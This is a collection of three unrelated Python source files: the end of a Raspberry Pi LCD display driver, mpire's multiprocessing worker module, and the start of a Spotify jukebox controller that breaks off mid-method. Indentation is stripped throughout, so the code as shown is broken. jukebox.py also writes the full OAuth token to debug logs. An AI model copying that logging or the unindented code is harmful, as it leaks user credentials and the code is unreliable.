GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_4, GPIO.IN, pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_5, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
self.reinitDisplay()
self.busy=[False,False,False,False]
self.shutdown=False
self.interruptMessage=["","","",""]
self.importance=[-1,-1,-1,-1]
self.useSyslog=False
self._log("raspberrySpyLcd Started")
if self.LCD_BACKLIGHT:
self.backlightThread = threading.Thread(target=self._backlightTimer)
self.backlightThread.daemon = True
self.backlightThread.start()
self.backlightTriggerThread = threading.Thread(target=self._backlightTrigger)
self.backlightTriggerThread.daemon = True
self.backlightTriggerThread.start()
def __del__(self):
self.shutdown=True
self._lcdByte(self.lines[0], self.LCD_CMD)
self._lcdString( "-"*self.LCD_WIDTH )
self._lcdByte(self.lines[1], self.LCD_CMD)
self._lcdString( "-"*self.LCD_WIDTH )
def _log(self,msg):
if self.useSyslog:
syslog.syslog(syslog.LOG_DEBUG, "(raspberrySpyLcd) %s" %(msg))
else:
sys.stderr.write("%s\n" %(msg))
def _backlightTrigger(self):
while True:
if os.path.exists("ipc/manual_backlight"):
self._log("Backlight Manual Trigger on IPC")
os.unlink("ipc/manual_backlight")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
if GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == True:
self._log("Backlight Manual Trigger on Pin 1")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == True:
self._log("Backlight Manual Trigger on Pin 2")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == True:
self._log("Backlight Manual Trigger on Pin 3")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_4) == True:
self._log("Backlight Manual Trigger on Pin 4")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_5) == True:
self._log("Backlight Manual Trigger on Pin 5")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
time.sleep(0.2)
def _backlightTimer(self):
while True:
if self.backlight:
if self.backlightTimer + self.backlightTimeout < time.time():
self._log("Backlight turning off after %s seconds" %(time.time()-(self.backlightTimer)))
GPIO.output(self.LCD_BACKLIGHT,0)
self.backlight=False
time.sleep(1)
def _doScrollText(self,text,line,autoBlank,doNotScrollToStart,alignCenter,autoWait,cropText,alert,importance):
if len(text) > self.LCD_WIDTH and cropText:
text=text[0:self.LCD_WIDTH]
if alignCenter:
if self.dbg: self._log("Showing cropped message %s (center align)" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
l=int((self.LCD_WIDTH-len(text))/2)
self._lcdString("%s%s" %(" "*l,text))
else:
if self.dbg: self._log("Showing cropped message %s" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
elif len(text) < self.LCD_WIDTH:
if alignCenter:
if self.dbg: self._log("Showing full message %s (center align)" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
l=int((self.LCD_WIDTH-len(text))/2)
self._lcdString("%s%s" %(" "*l,text))
else:
if self.dbg: self._log("Showing full message %s" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
else:
if self.dbg: self._log("...started thread for scroll message %s" %(text))
for c in range((len(text)-self.LCD_WIDTH)+1):
if os.path.exists("ipc/manual_backlight") or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == False:# or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == False:
if os.path.exists("ipc/manual_backlight"):
os.unlink("ipc/manual_backlight")
print "Triggering interrupt message code here"
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( self.interruptMessage[line] )
self.busy[line]=False
return
if not self.shutdown:
if alert: self.backlightTimer=time.time()
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( text[c:] )
for tx in range(4):
if os.path.exists("ipc/manual_backlight") or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_4) or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_5):
if os.path.exists("ipc/manual_backlight"):
os.unlink("ipc/manual_backlight")
print "Triggering interrupt message code here"
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( self.interruptMessage[line] )
self.busy[line]=False
return
time.sleep(0.1)
if not doNotScrollToStart:
time.sleep(3)
if self.dbg: self._log("...resetting long line to begining" )
if alert: self.backlightTimer=time.time()+autoWait
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
if autoBlank:
if self.dbg: self._log("...waiting %s seconds for autoblank" %(autoBlank))
if alert: self.backlightTimer=time.time()+autoBlank
time.sleep(autoBlank)
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(" "*self.LCD_WIDTH)
if autoWait:
if self.dbg: self._log("...waiting %s seconds for autowait" %(autoWait))
if alert: self.backlightTimer=time.time()+autoWait
time.sleep(autoWait)
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(" "*self.LCD_WIDTH)
if not autoWait and not autoBlank:
time.sleep(0.135) # must wait a small amount of time
self.busy[line]=False
def reinitDisplay(self):
# Initialise display
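# Standard HD44780 init sequence: 0x33/0x32 switch the controller to 4-bit mode,
# 0x28 selects 2-line mode with a 5x8 font, 0x0C turns the display on with the
# cursor off, 0x06 sets the entry mode to auto-increment, and 0x01 clears the display.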
self._lcdByte(0x33,self.LCD_CMD)
self._lcdByte(0x32,self.LCD_CMD)
self._lcdByte(0x28,self.LCD_CMD)
self._lcdByte(0x0C,self.LCD_CMD)
self._lcdByte(0x06,self.LCD_CMD)
self._lcdByte(0x01,self.LCD_CMD)
def enableBacklight(self):
self._log("Enabling Backlight")
GPIO.output(self.LCD_BACKLIGHT,1)
self.backlightTimer = time.time()
self.backlight=True
def scrollText(self,text,line=0,autoBlank=0,doNotScrollToStart=1,alignCenter=0,autoWait=0,cropText=0,alert=1,importance=1,onInterruptMessage=""):
"""
text [mandatory]
line [optional, 0-3] defaults to the first line (0)
autoBlank [optional n] wait 'n' seconds before blanking
doNotScrollToStart [optional 0,1] if 0, jump back to the start after scrolling a message
alignCenter [optional 0,1] if message fits in the display width align to center
autoWait [optional n] wait at least 'n' seconds before the next message - don't blank afterwards
cropText [optional 0,1] cropText (don't scroll)
alert [optional 0,1] should the backlight timer be reset and the backlight enabled
importance [optional] messages less important than the line's current importance are dropped; a negative value cancels a matching importance
onInterruptMessage what we should display if a scroll is completed
"""
if self.dbg: self._log("Text To Display on Line %s: %s\n" %(line,text))
if line == 0:
self.reinitDisplay()
if importance < 0:
print "Checking if we can cancel the importance flag for line ",line
if -importance == self.importance[line]:
print "yes we cane"
self.importance[line]=-99
print -importance,self.importance[line]
if self.importance[line] > importance:
print "our importance is less than current importance.",importance,self.importance[line],text
return
while self.busy[line]:
if self.dbg: self._log("...Line %s busy\n" %(line))
time.sleep(0.1)
self.busy[line]=True
self.importance[line]= importance
if self.LCD_BACKLIGHT and alert:
self.enableBacklight()
self.interruptMessage[line] = onInterruptMessage
print "if we are interrupted we are going to show",onInterruptMessage," <<<",line
self.scrollerThread = threading.Thread(target=self._doScrollText,args=(text,line,autoBlank,doNotScrollToStart,alignCenter,autoWait,cropText,alert,importance))
self.scrollerThread.daemon=True
self.scrollerThread.start()
time.sleep(0.10)
def _lcdString(self,message):
message = message.ljust(self.LCD_WIDTH," ")
for i in range(self.LCD_WIDTH):
self._lcdByte(ord(message[i]),self.LCD_CHR)
def _lcdByte(self,bits, mode):
# Send byte to data pins
# bits = data
# mode = True for character
# False for command
GPIO.output(self.LCD_RS, mode) # RS
# High bits
GPIO.output(self.LCD_D4, False)
GPIO.output(self.LCD_D5, False)
GPIO.output(self.LCD_D6, False)
GPIO.output(self.LCD_D7, False)
if bits&0x10==0x10:
GPIO.output(self.LCD_D4, True)
if bits&0x20==0x20:
GPIO.output(self.LCD_D5, True)
if bits&0x40==0x40:
GPIO.output(self.LCD_D6, True)
if bits&0x80==0x80:
GPIO.output(self.LCD_D7, True)
# Toggle 'Enable' pin
time.sleep(self.E_DELAY)
GPIO.output(self.LCD_E, True)
time.sleep(self.E_PULSE)
GPIO.output(self.LCD_E, False)
time.sleep(self.E_DELAY)
# Low bits
GPIO.output(self.LCD_D4, False)
GPIO.output(self.LCD_D5, False)
GPIO.output(self.LCD_D6, False)
GPIO.output(self.LCD_D7, False)
if bits&0x01==0x01:
GPIO.output(self.LCD_D4, True)
if bits&0x02==0x02:
GPIO.output(self.LCD_D5, True)
if bits&0x04==0x04:
GPIO.output(self.LCD_D6, True)
if bits&0x08==0x08:
GPIO.output(self.LCD_D7, True)
# Toggle 'Enable' pin
time.sleep(self.E_DELAY)
GPIO.output(self.LCD_E, True)
time.sleep(self.E_PULSE)
GPIO.output(self.LCD_E, False)
time.sleep(self.E_DELAY)
if __name__ == '__main__':
testHarness=True
lcd = raspberrySpyLcd()
try:
lcd.scrollText(sys.argv[1],0)
testHarness=False
except:
pass
try:
lcd.scrollText(sys.argv[2],1)
testHarness=False
except:
pass
try:
time.sleep(int(sys.argv[3]))
except IndexError:
pass
except KeyboardInterrupt:
pass
if not testHarness:
sys.exit(0)
if testHarness:
sys.stderr.write("Test Harness, simple test\n")
lcd.scrollText("Testing, Testing, 1,2,1,2 HD44780",0)
lcd.scrollText("Test script for modified raspberrypi-spy.co.uk script",1)
time.sleep(30)
sys.stderr.write("Test Harness, not backlightt\n")
lcd.scrollText("do not enable",0,alert=0)
lcd.scrollText("backlight",1,alert=0)
time.sleep(15)
sys.stderr.write("Test Harness, with backlight and center line 0\n")
lcd.scrollText("with",0,alert=1,alignCenter=1)
lcd.scrollText("backlight",1,alert=0)
time.sleep(5)
lcd.scrollText("no",0,alert=0,alignCenter=1,autoBlank=3)
lcd.scrollText("backlight",1,alert=0)
time.sleep(50)
time.sleep(5000)
lcd=None
|
worker.py
|
import collections.abc
try:
import dill as pickle
except ImportError:
import pickle
import multiprocessing as mp
import signal
import traceback
import _thread
from datetime import datetime
from functools import partial
from threading import Thread
from typing import Any, Callable, List, Optional, Tuple, Union, Type
try:
import multiprocess
DILL_INSTALLED = True
except ImportError:
DILL_INSTALLED = False
try:
import numpy as np
NUMPY_INSTALLED = True
except ImportError:
np = None
NUMPY_INSTALLED = False
from mpire.comms import NON_LETHAL_POISON_PILL, POISON_PILL, WorkerComms
from mpire.context import FORK_AVAILABLE, MP_CONTEXTS, RUNNING_WINDOWS
from mpire.dashboard.connection_utils import DashboardConnectionDetails, set_dashboard_connection
from mpire.exception import CannotPickleExceptionError, StopWorker
from mpire.insights import WorkerInsights
from mpire.params import WorkerPoolParams
from mpire.tqdm_utils import TqdmConnectionDetails, TqdmManager
from mpire.utils import TimeIt
class AbstractWorker:
"""
A multiprocessing helper class which continuously asks the queue for new jobs, until a poison pill is inserted
"""
def __init__(self, worker_id: int, params: WorkerPoolParams, worker_comms: WorkerComms,
worker_insights: WorkerInsights, tqdm_connection_details: TqdmConnectionDetails,
dashboard_connection_details: DashboardConnectionDetails, start_time: datetime) -> None:
"""
:param worker_id: Worker ID
:param params: WorkerPool parameters
:param worker_comms: Worker communication objects (queues, locks, events, ...)
:param worker_insights: WorkerInsights object which stores the worker insights
:param tqdm_connection_details: Tqdm manager host, and whether the manager is started/connected
:param dashboard_connection_details: Dashboard manager host, port_nr and whether a dashboard is
started/connected
:param start_time: `datetime` object indicating at what time the Worker instance was created and started
"""
super().__init__()
# Parameters
self.worker_id = worker_id
self.params = params
self.worker_comms = worker_comms
self.worker_insights = worker_insights
self.tqdm_connection_details = tqdm_connection_details
self.dashboard_connection_details = dashboard_connection_details
self.start_time = start_time
# Worker state
self.worker_state = {}
# Local variables needed for each worker
self.progress_bar_last_updated = datetime.now()
self.progress_bar_n_tasks_completed = 0
self.max_task_duration_last_updated = datetime.now()
self.max_task_duration_list = self.worker_insights.get_max_task_duration_list(self.worker_id)
# Exception handling variables
if self.params.start_method == 'threading':
ctx = MP_CONTEXTS['threading']
else:
ctx = MP_CONTEXTS['mp_dill' if self.params.use_dill else 'mp'][self.params.start_method]
self.is_running = False
self.is_running_lock = ctx.Lock()
# Register handler for graceful shutdown. This doesn't work on Windows
if not RUNNING_WINDOWS:
signal.signal(signal.SIGUSR1, self._exit_gracefully)
def _exit_gracefully(self, *_) -> None:
"""
This function is called when the main process sends a kill signal to this process. This can only mean another
child process encountered an exception which means we should exit.
If this process is in the middle of running the user defined function we raise a StopWorker exception (which is
then caught by the ``_run_safely()`` function) so we can quit gracefully.
"""
# A rather complex locking and exception mechanism is used here so we can make sure we only raise an exception
# when we should. We want to make sure we only raise an exception when the user function is called. If it is
# running the exception is caught and `run` will return. If it is running and the user function throws another
# exception first, it depends on who obtains the lock first. If `run` obtains it, it will set `running` to
# False, meaning we won't raise and `run` will return. If this function obtains it first it will throw, which
# again is caught by the `run` function, which will return.
self.worker_comms.set_kill_signal_received()
with self.is_running_lock:
if self.is_running:
self.is_running = False
raise StopWorker
def _exit_gracefully_windows(self):
"""
Windows doesn't fully support signals as Unix-based systems do. Therefore, we have to work around it. This
function is started in a thread. We wait for a kill signal (Event object) and interrupt the main thread if we
got it (derived from https://stackoverflow.com/a/40281422). This will raise a KeyboardInterrupt, which is then
caught by the signal handler, which in turn checks if we need to raise a StopWorker.
        Note: functions that release the GIL won't be interrupted by this procedure (e.g., time.sleep). If graceful
shutdown takes too long the process will be terminated by the main process. If anyone has a better approach for
graceful interrupt in Windows, please create a PR.
"""
while self.worker_comms.is_worker_alive(self.worker_id):
if self.worker_comms.wait_for_exception_thrown(timeout=0.1):
_thread.interrupt_main()
return
def run(self) -> None:
"""
        Continuously asks the tasks queue for new task arguments. As long as it does not receive a poison pill and the
        maximum life span has not been reached, it executes the new task and puts the results in the results queue.
"""
# Enable graceful shutdown for Windows. Note that we can't kill threads in Python
if RUNNING_WINDOWS and self.params.start_method != "threading":
signal.signal(signal.SIGINT, self._exit_gracefully)
t = Thread(target=self._exit_gracefully_windows)
t.start()
self.worker_comms.set_worker_alive(self.worker_id)
# Set tqdm and dashboard connection details. This is needed for nested pools and in the case forkserver or
# spawn is used as start method
TqdmManager.set_connection_details(self.tqdm_connection_details)
set_dashboard_connection(self.dashboard_connection_details, auto_connect=False)
try:
# Store how long it took to start up
self.worker_insights.update_start_up_time(self.worker_id, self.start_time)
# Obtain additional args to pass to the function
additional_args = []
if self.params.pass_worker_id:
additional_args.append(self.worker_id)
if self.params.shared_objects is not None:
additional_args.append(self.params.shared_objects)
if self.params.use_worker_state:
additional_args.append(self.worker_state)
# Run initialization function. If it returns True it means an exception occurred and we should exit
if self.params.worker_init and self._run_init_func(additional_args):
return
# Determine what function to call. If we have to keep in mind the order (for map) we use the helper function
# with idx support which deals with the provided idx variable.
func = partial(self._helper_func_with_idx if self.worker_comms.keep_order() else self._helper_func,
partial(self.params.func, *additional_args))
n_tasks_executed = 0
while self.params.worker_lifespan is None or n_tasks_executed < self.params.worker_lifespan:
# Obtain new chunk of jobs
with TimeIt(self.worker_insights.worker_waiting_time, self.worker_id):
next_chunked_args = self.worker_comms.get_task(self.worker_id)
# Force update task insights and progress bar when we got a (non-lethal) poison pill. At this point, we
# know for sure that all results have been processed. In case of a lethal pill we additionally run the
# worker exit function, wait for all the exit results to be obtained, wait for the progress bar to be
# done, and stop. Otherwise, we simply continue
if next_chunked_args == POISON_PILL or next_chunked_args == NON_LETHAL_POISON_PILL:
self._update_task_insights(force_update=True)
self._update_progress_bar(force_update=True)
self.worker_comms.task_done(self.worker_id)
if next_chunked_args == POISON_PILL:
if self.params.worker_exit:
self._run_exit_func(additional_args)
self.worker_comms.wait_until_all_exit_results_obtained()
if self.worker_comms.has_progress_bar():
self.worker_comms.wait_until_progress_bar_is_complete()
return
else:
continue
                # When we received None it means we need to stop because of an exception in the main process
elif next_chunked_args is None:
return
# Execute jobs in this chunk
try:
results = []
for args in next_chunked_args:
# Try to run this function and save results
results_part, should_return = self._run_func(func, args)
if should_return:
return
results.append(results_part)
# Update progress bar info
self._update_progress_bar()
# Send results back to main process
self.worker_comms.add_results(self.worker_id, results)
n_tasks_executed += len(results)
# In case an exception occurred and we need to return, we want to call task_done no matter what
finally:
self.worker_comms.task_done(self.worker_id)
# Update task insights
self._update_task_insights()
# Max lifespan reached
self._update_task_insights(force_update=True)
self._update_progress_bar(force_update=True)
if self.params.worker_exit and self._run_exit_func(additional_args):
return
# Notify WorkerPool to start a new worker
if self.params.worker_lifespan is not None and n_tasks_executed == self.params.worker_lifespan:
self.worker_comms.signal_worker_restart(self.worker_id)
finally:
self.worker_comms.set_worker_dead(self.worker_id)
def _run_init_func(self, additional_args: List) -> bool:
"""
Runs the init function when provided.
:param additional_args: Additional args to pass to the function (worker ID, shared objects, worker state)
:return: True when the worker needs to shut down, False otherwise
"""
def _init_func():
with TimeIt(self.worker_insights.worker_init_time, self.worker_id):
self.params.worker_init(*additional_args)
return self._run_safely(_init_func, no_args=True)[1]
def _run_func(self, func: Callable, args: List) -> Tuple[Any, bool]:
"""
Runs the main function when provided.
:param func: Function to call
:param args: Args to pass to the function
:return: Tuple containing results from the function and a boolean value indicating whether the worker needs to
shut down
"""
def _func():
with TimeIt(self.worker_insights.worker_working_time, self.worker_id,
self.max_task_duration_list, lambda: self._format_args(args, separator=' | ')):
results = func(args)
self.worker_insights.update_n_completed_tasks(self.worker_id)
return results
return self._run_safely(_func, args)
def _run_exit_func(self, additional_args: List) -> bool:
"""
Runs the exit function when provided and stores its results.
:param additional_args: Additional args to pass to the function (worker ID, shared objects, worker state)
:return: True when the worker needs to shut down, False otherwise
"""
def _exit_func():
with TimeIt(self.worker_insights.worker_exit_time, self.worker_id):
return self.params.worker_exit(*additional_args)
results, should_return = self._run_safely(_exit_func, no_args=True)
if should_return:
return True
else:
self.worker_comms.add_exit_results(self.worker_id, results)
return False
def _run_safely(self, func: Callable, exception_args: Optional[Any] = None,
no_args: bool = False) -> Tuple[Any, bool]:
"""
A rather complex locking and exception mechanism is used here so we can make sure we only raise an exception
when we should. See `_exit_gracefully` for more information.
:param func: Function to run
:param exception_args: Arguments to pass to `_format_args` when an exception occurred
:param no_args: Whether there were any args at all
        :return: Tuple containing the results of the function and a boolean indicating whether the worker needs to
            shut down
"""
if self.worker_comms.exception_thrown():
return None, True
try:
try:
# Obtain lock and try to run the function. During this block a StopWorker exception from the parent
# process can come through to signal we should stop
with self.is_running_lock:
self.is_running = True
results = func()
with self.is_running_lock:
self.is_running = False
except StopWorker:
# The main process tells us to stop working, shutting down
raise
except Exception as err:
# An exception occurred inside the provided function. Let the signal handler know it shouldn't raise any
# StopWorker exceptions from the parent process anymore, we got this.
with self.is_running_lock:
self.is_running = False
# Pass exception to parent process and stop
self._raise(exception_args, no_args, err)
raise StopWorker
except StopWorker:
# Stop working
return None, True
# Carry on
return results, False
def _raise(self, args: Any, no_args: bool, err: Exception) -> None:
"""
Create exception and pass it to the parent process. Let other processes know an exception is set
        :param args: Function arguments where the exception was raised
:param no_args: Whether there were any args at all
:param err: Exception that should be passed on to parent process
"""
# Only one process can throw at a time
with self.worker_comms.exception_lock:
# Only raise an exception when this process is the first one to raise. We do this because when the first
# exception is caught by the main process the workers are joined which can cause a deadlock on draining the
# exception queue. By only allowing one process to throw we know for sure that the exception queue will be
# empty when the first one arrives.
if not self.worker_comms.exception_thrown():
# Let others know we need to stop
self.worker_comms.set_exception_thrown()
# Create traceback string
traceback_str = "\n\nException occurred in Worker-%d with the following arguments:\n%s\n%s" % (
self.worker_id, self._format_args(args, no_args), traceback.format_exc()
)
# Sometimes an exception cannot be pickled (i.e., we get the _pickle.PickleError: Can't pickle
# <class ...>: it's not the same object as ...). We check that here by trying the pickle.dumps manually.
# The call to `queue.put` creates a thread in which it pickles and when that raises an exception we
# cannot catch it.
try:
pickle.dumps(type(err))
except pickle.PicklingError:
err = CannotPickleExceptionError()
# Add exception. When we have a progress bar, we add an additional one
self.worker_comms.add_exception(type(err), traceback_str)
if self.worker_comms.has_progress_bar():
self.worker_comms.add_exception(type(err), traceback_str)
def _format_args(self, args: Any, no_args: bool = False, separator: str = '\n') -> str:
"""
Format the function arguments to a string form.
        :param args: Function arguments
:param no_args: Whether there were any args at all. If not, then return special string
:param separator: String to use as separator between arguments
:return: String containing the task arguments
"""
# Determine function arguments
func_args = args[1] if args and self.worker_comms.keep_order() else args
if no_args:
return "N/A"
elif isinstance(func_args, dict):
return separator.join("Arg %s: %s" % (str(key), repr(value)) for key, value in func_args.items())
elif isinstance(func_args, collections.abc.Iterable) and not isinstance(func_args, (str, bytes)):
return separator.join("Arg %d: %s" % (arg_nr, repr(arg)) for arg_nr, arg in enumerate(func_args))
else:
return "Arg 0: %s" % func_args
def _helper_func_with_idx(self, func: Callable, args: Tuple[int, Any]) -> Tuple[int, Any]:
"""
Helper function which calls the function `func` but preserves the order index
:param func: Function to call each time new task arguments become available
:param args: Tuple of ``(idx, _args)`` where ``_args`` correspond to the arguments to pass on to the function.
``idx`` is used to preserve order
:return: (idx, result of calling the function with the given arguments) tuple
"""
return args[0], self._call_func(func, args[1])
def _helper_func(self, func: Callable, args: Any) -> Any:
"""
Helper function which calls the function `func`
:param func: Function to call each time new task arguments become available
:param args: Arguments to pass on to the function
        :return: Result of calling the function with the given arguments
"""
return self._call_func(func, args)
@staticmethod
def _call_func(func: Callable, args: Any) -> Any:
"""
Helper function which calls the function `func` and passes the arguments in the correct way
:param func: Function to call each time new task arguments become available
:param args: Arguments to pass on to the function
        :return: Result of calling the function with the given arguments
"""
if isinstance(args, dict):
return func(**args)
elif (isinstance(args, collections.abc.Iterable) and not isinstance(args, (str, bytes)) and not
(NUMPY_INSTALLED and isinstance(args, np.ndarray))):
return func(*args)
else:
return func(args)
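    # Dispatch summary for _call_func (added comment): a dict is unpacked as keyword
    # arguments, a non-string/bytes iterable (that is not a numpy array) is unpacked as
    # positional arguments, and anything else is passed as a single positional argument.
    # For example, {'a': 1} -> func(a=1), (1, 2) -> func(1, 2), 5 -> func(5).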
def _update_progress_bar(self, force_update: bool = False) -> None:
"""
Update the progress bar data
:param force_update: Whether to force an update
"""
if self.worker_comms.has_progress_bar():
(self.progress_bar_last_updated,
self.progress_bar_n_tasks_completed) = self.worker_comms.task_completed_progress_bar(
self.progress_bar_last_updated, self.progress_bar_n_tasks_completed, force_update
)
def _update_task_insights(self, force_update: bool = False) -> None:
"""
Update the task insights data
:param force_update: Whether to force an update
"""
self.max_task_duration_last_updated = self.worker_insights.update_task_insights(
self.worker_id, self.max_task_duration_last_updated, self.max_task_duration_list, force_update=force_update
)
if FORK_AVAILABLE:
class ForkWorker(AbstractWorker, MP_CONTEXTS['mp']['fork'].Process):
pass
class ForkServerWorker(AbstractWorker, MP_CONTEXTS['mp']['forkserver'].Process):
pass
class SpawnWorker(AbstractWorker, MP_CONTEXTS['mp']['spawn'].Process):
pass
class ThreadingWorker(AbstractWorker, MP_CONTEXTS['threading'].Thread):
pass
if DILL_INSTALLED:
if FORK_AVAILABLE:
        class DillForkWorker(AbstractWorker, MP_CONTEXTS['mp_dill']['fork'].Process):
pass
class DillForkServerWorker(AbstractWorker, MP_CONTEXTS['mp_dill']['forkserver'].Process):
pass
class DillSpawnWorker(AbstractWorker, MP_CONTEXTS['mp_dill']['spawn'].Process):
pass
def worker_factory(start_method: str, use_dill: bool) -> Type[Union[AbstractWorker, mp.Process, Thread]]:
"""
Returns the appropriate worker class given the start method
:param start_method: What Process/Threading start method to use, see the WorkerPool constructor
    :param use_dill: Whether to use dill as serialization backend. Some exotic types (e.g., lambdas, nested functions)
        don't work well when using ``spawn`` as start method. In such cases, use ``dill`` (can be a bit slower
        sometimes)
:return: Worker class
"""
if start_method == 'threading':
return ThreadingWorker
elif use_dill:
if not DILL_INSTALLED:
raise ImportError("Can't use dill as the dependencies are not installed. Use `pip install mpire[dill]` to "
"install the required dependencies.")
elif start_method == 'fork':
if not FORK_AVAILABLE:
raise ValueError("Start method 'fork' is not available")
return DillForkWorker
elif start_method == 'forkserver':
if not FORK_AVAILABLE:
raise ValueError("Start method 'forkserver' is not available")
return DillForkServerWorker
elif start_method == 'spawn':
return DillSpawnWorker
else:
raise ValueError(f"Unknown start method with dill: '{start_method}'")
else:
if start_method == 'fork':
if not FORK_AVAILABLE:
raise ValueError("Start method 'fork' is not available")
return ForkWorker
elif start_method == 'forkserver':
if not FORK_AVAILABLE:
raise ValueError("Start method 'forkserver' is not available")
return ForkServerWorker
elif start_method == 'spawn':
return SpawnWorker
else:
raise ValueError("Unknown start method: '{}'".format(start_method))
|
jukebox.py
|
"""
jukebox.py
"""
import logging
import os
import threading
import time
from pprint import pprint
from typing import Tuple, List, Union, Optional, Generator, Dict
import spotipy
import spotipy.util as util
from dotenv import load_dotenv
from spotipy.oauth2 import SpotifyOAuth
import json
import socket
# Initialize
load_dotenv()
CLIENT_ID = os.environ.get("CLIENT_ID")
CLIENT_SECRET = os.environ.get("CLIENT_SECRET")
SPOTIFY_USERNAME = os.environ.get("SPOTIFY_USERNAME")
REDIRECT_URI = "http://127.0.0.1:7070"
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(process)d-%(levelname)s %(message)s",
datefmt="%m/%d/%Y %I:%M:%S %p",
)
# limit useless spotify logging details
spot_logger = logging.getLogger("spotipy")
spot_logger.setLevel(logging.WARNING)
def spotipy_instance(
username: str,
) -> List[Union[spotipy.client.Spotify, SpotifyOAuth, Dict]]:
"""Returns a 'spotipy.Spotify' instance. Will request authenication at Redirect URL if not logged in before.
Parameter username: integer found in Spotify profile
Note, token expires after 60 minutes. Recommend refreshing more often than hourly.
"""
scope = (
"user-read-playback-state,user-modify-playback-state,playlist-read-private,"
+ "playlist-read-collaborative,user-read-currently-playing,user-read-private,"
+ "user-library-read,user-read-playback-position"
)
try:
token = util.prompt_for_user_token(
username=username,
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
)
sp_auth = SpotifyOAuth(
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
)
sp = spotipy.Spotify(
auth=token,
client_credentials_manager=sp_auth,
)
cached_token = spotipy.oauth2.SpotifyOAuth(
username=username,
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
).get_cached_token()
logging.debug(f"Token successfully created/refreshed for {username}.")
logging.debug(f"full auth token: {cached_token}")
    except Exception as e:
        logging.exception(msg=f"Can't get token for {username}.\n{e}")
        raise  # without a valid token the objects below would be undefined
    return [sp, sp_auth, cached_token]
def refresh_token(
    sp_auth: SpotifyOAuth, sp: spotipy.client.Spotify, whole_token: Dict
) -> Tuple[Dict, spotipy.client.Spotify]:
"""Refreshes the spotify OAuth token.
Parameter sp_auth: SpotifyOAuth object with username and all details included (e.g. scope)
Parameter sp: spotipy.Spotify, state will be modified and returned.
    Parameter whole_token: Dict, token returned by the Spotify API. Updated and returned at the end.
"""
logging.info("Refreshing spotify token...\n")
logging.debug(f"Cached access token info: {whole_token}")
token_info = sp_auth.refresh_access_token(whole_token["refresh_token"])
token = token_info["access_token"]
sp = spotipy.Spotify(auth=token)
return token_info, sp
def get_jukebox_id(sp: spotipy.client.Spotify) -> str:
"""Pass a spotify client and return the device number for the jukebox.
Parameter sp: spotify client
"""
result = sp.devices()
rest = result.get("devices")
box_id = ""
for device in rest:
if device["name"] == "Kid_Jukebox":
box_id = device["id"]
break
if box_id == "":
logging.error(f"Jukebox Id not found. Aborting...")
os._exit(1)
logging.debug(f"Jukebox Id={box_id}")
return box_id
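# Note (added): `prime` advances a freshly created generator to its first `yield` by
# calling send(None), so the state coroutines below can immediately accept .send(command)
# without raising "can't send non-None value to a just-started generator".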
def prime(fn):
def wrapper(*args, **kwargs):
v = fn(*args, **kwargs)
v.send(None)
return v
return wrapper
class FSM_jukebox:
def __init__(self):
self.stopped = self._create_stopped()
self.playing = self._create_playing()
self.paused = self._create_paused()
self.current_state = self.stopped
self.username = SPOTIFY_USERNAME
self.sp, self.sp_auth, self.token = spotipy_instance(username=self.username)
self.device_id = get_jukebox_id(self.sp)
self.records = self._load_records()
self._repeat_status = True
self.sp.repeat(state="context", device_id=self.device_id)
self._shuffle_status = True
self.sp.shuffle(state=True, device_id=self.device_id)
self._lock = threading.Lock()
self._refresh_thread = threading.Thread(target=self._refresh)
self._refresh_thread.daemon = True
self._refresh_thread.start()
def _refresh(self) -> None:
"""A function running in a separate daemon thread which will refresh spotify credentials"""
interval = 5 * 60 # testing every 5 minutes to keep connection alive
while True:
try:
logging.debug("Locking FSM for refresh")
with self._lock:
self.token, self.sp = refresh_token(
self.sp_auth, self.sp, self.token
)
# Make sure jukebox did not change id
self.device_id = get_jukebox_id(self.sp)
logging.debug("Refresh completed, unlocking FSM")
time.sleep(interval)
except socket.error:
logging.debug(
"There was a socket error. Refresh unable to be completed. Retrying in 1 minute..."
)
time.sleep(60)
def send(self, command: Tuple[str, ...]) -> None:
assert len(command) == 2
if command[1] != "" and command[0] == "play/pause":
fixed_command = (
command[0],
self.records["records"].get(command[1]).get("uri"),
)
self.current_state.send(fixed_command)
else:
self.current_state.send(command)
def _shuffle(self):
